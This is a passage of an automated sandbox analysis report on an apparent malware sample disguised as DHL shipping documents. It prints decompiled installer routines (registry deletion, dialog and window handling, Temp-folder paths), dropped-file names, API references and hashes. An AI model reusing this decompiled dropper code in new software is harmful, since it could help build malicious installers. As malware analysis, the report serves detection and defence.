				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















                        0x00404e7a
                        0x00404e7f
                        0x00404e87
                        0x00404e88
                        0x00404e95
                        0x00404e9d
                        0x00404e9e
                        0x00404ea0
                        0x00404ea2
                        0x00404ea4
                        0x00404ea7
                        0x00404ea7
                        0x00404eae
                        0x00404eb4
                        0x00404eb4
                        0x00404ebb
                        0x00404ec2
                        0x00404ec5
                        0x00404ec8
                        0x00404ec8
                        0x00404ecc
                        0x00404edc
                        0x00404ede
                        0x00404ee1
                        0x00404e8a
                        0x00404e8a
                        0x00404e91
                        0x00404e91
                        0x00404ee9
                        0x00404ef4
                        0x00404f0a
                        0x00404f1b
                        0x00404f37

                        APIs
                        • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                        • wsprintfW.USER32 ref: 00404F1B
                        • SetDlgItemTextW.USER32 ref: 00404F2E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: ItemTextlstrlenwsprintf
                        • String ID: %u.%u%s%s$H7B
                        • API String ID: 3540041739-107966168
                        • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                        • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                        • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                        • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 48%
                        			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                        0x00402eb4
                        0x00402ebd
                        0x00402ec6
                        0x00402ed2
                        0x00402edb
                        0x00402ee5
                        0x00402f0a
                        0x00402f10
                        0x00402f15
                        0x00402f16
                        0x00402f46
                        0x00402f1f
                        0x00402f21
                        0x00402f71
                        0x00402f74
                        0x00000000
                        0x00402f7a
                        0x00402f30
                        0x00402f35
                        0x00402f37
                        0x00000000
                        0x00000000
                        0x00402f3f
                        0x00402f44
                        0x00402f45
                        0x00402f45
                        0x00402f52
                        0x00402f5a
                        0x00402f61
                        0x00000000
                        0x00402f8a
                        0x00000000
                        0x00402f69
                        0x00402ef5
                        0x00402f08
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402f08
                        0x00402f90

                        APIs
                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CloseEnum$DeleteValue
                        • String ID:
                        • API String ID: 1354259210-0
                        • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                        • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                        • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                        • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                        0x00401d81
                        0x00401d85
                        0x00401d9a
                        0x00401d87
                        0x00401d89
                        0x00401d8f
                        0x00401d8f
                        0x00401da0
                        0x00401da3
                        0x00401dad
                        0x00401db0
                        0x00401db8
                        0x00401dc9
                        0x00401dcc
                        0x00401dd7
                        0x00401dce
                        0x00401dd0
                        0x00401dd0
                        0x00401ddb
                        0x00401de5
                        0x00401e0c
                        0x00401e1b
                        0x00401e29
                        0x00401e31
                        0x00401e39
                        0x00401e39
                        0x00401e42
                        0x00401e48
                        0x00402ba4
                        0x00402ba4
                        0x00402c2d
                        0x00402c39

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                        • String ID:
                        • API String ID: 1849352358-0
                        • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                        • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                        • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                        • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                        Download Yara Rule
                        C-Code - Quality: 73%
                        			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                        0x00401e4e
                        0x00401e59
                        0x00401e5b
                        0x00401e68
                        0x00401e7f
                        0x00401e84
                        0x00401e91
                        0x00401e96
                        0x00401e9a
                        0x00401ea5
                        0x00401eac
                        0x00401ebe
                        0x00401ec4
                        0x00401ec9
                        0x00401ed3
                        0x00402638
                        0x0040156d
                        0x00402ba4
                        0x00402c2d
                        0x00402c39

                        APIs
                        • GetDC.USER32(?), ref: 00401E51
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                        • ReleaseDC.USER32 ref: 00401E84
                          • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                          • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                        • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                        • String ID:
                        • API String ID: 2584051700-0
                        • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                        • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                        • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                        • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 59%
                        			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                        0x00401c43
                        0x00401c45
                        0x00401c4c
                        0x00401c4f
                        0x00401c52
                        0x00401c5c
                        0x00401c60
                        0x00401c63
                        0x00401c6c
                        0x00401c6c
                        0x00401c6f
                        0x00401c73
                        0x00401c7c
                        0x00401c7c
                        0x00401c7f
                        0x00401c83
                        0x00401c85
                        0x00401cda
                        0x00401cdc
                        0x00401ce7
                        0x00401cf1
                        0x00401cf4
                        0x00401cf4
                        0x00401cfd
                        0x00000000
                        0x00401c87
                        0x00401c8e
                        0x00401c90
                        0x00401c93
                        0x00401c99
                        0x00401ca0
                        0x00401ca3
                        0x00401ccb
                        0x00401d03
                        0x00401d03
                        0x00401ca5
                        0x00401cb3
                        0x00401cbb
                        0x00401cbe
                        0x00401cbe
                        0x00401ca3
                        0x00401d06
                        0x00401d09
                        0x00401d0f
                        0x00402ba4
                        0x00402ba4
                        0x00402c2d
                        0x00402c39

                        APIs
                        • SendMessageTimeoutW.USER32 ref: 00401CB3
                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: MessageSend$Timeout
                        • String ID: !
                        • API String ID: 1777923405-2657877971
                        • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                        • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                        • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                        • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44registryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                        0x00406544
                        0x00406546
                        0x0040655b
                        0x0040655e
                        0x00406563
                        0x00406568
                        0x004065a6
                        0x004065a6
                        0x0040656a
                        0x0040657c
                        0x00406587
                        0x0040658d
                        0x00406598
                        0x00000000
                        0x00000000
                        0x00406598
                        0x004065ac

                        APIs
                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,?,?,0040679D,80000002), ref: 0040657C
                        • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00000000,00422728), ref: 00406587
                        Strings
                        • "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m, xrefs: 0040653D
                        • ('B, xrefs: 0040655B
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CloseQueryValue
                        • String ID: "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m$('B
                        • API String ID: 3356406503-4105024501
                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                        • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                        • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 58%
                        			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                        0x00405f38
                        0x00405f45
                        0x00405f46
                        0x00405f51
                        0x00405f59
                        0x00405f59
                        0x00405f61

                        APIs
                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CharPrevlstrcatlstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 2659869361-3916508600
                        • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                        • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                        • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                        • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 89%
                        			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}





                        0x00405642
                        0x0040564c
                        0x00405668
                        0x0040568a
                        0x0040568d
                        0x00405693
                        0x0040569d
                        0x0040569e
                        0x004056a0
                        0x004056a6
                        0x004056a6
                        0x004056b0
                        0x00000000
                        0x004056be
                        0x00405675
                        0x004056ad
                        0x004056ad
                        0x00000000
                        0x004056ad
                        0x00405681
                        0x00405683
                        0x00000000
                        0x00405683
                        0x00405652
                        0x00000000
                        0x00000000
                        0x00405659
                        0x00000000

                        APIs
                        • IsWindowVisible.USER32(?), ref: 0040566D
                        • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                          • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
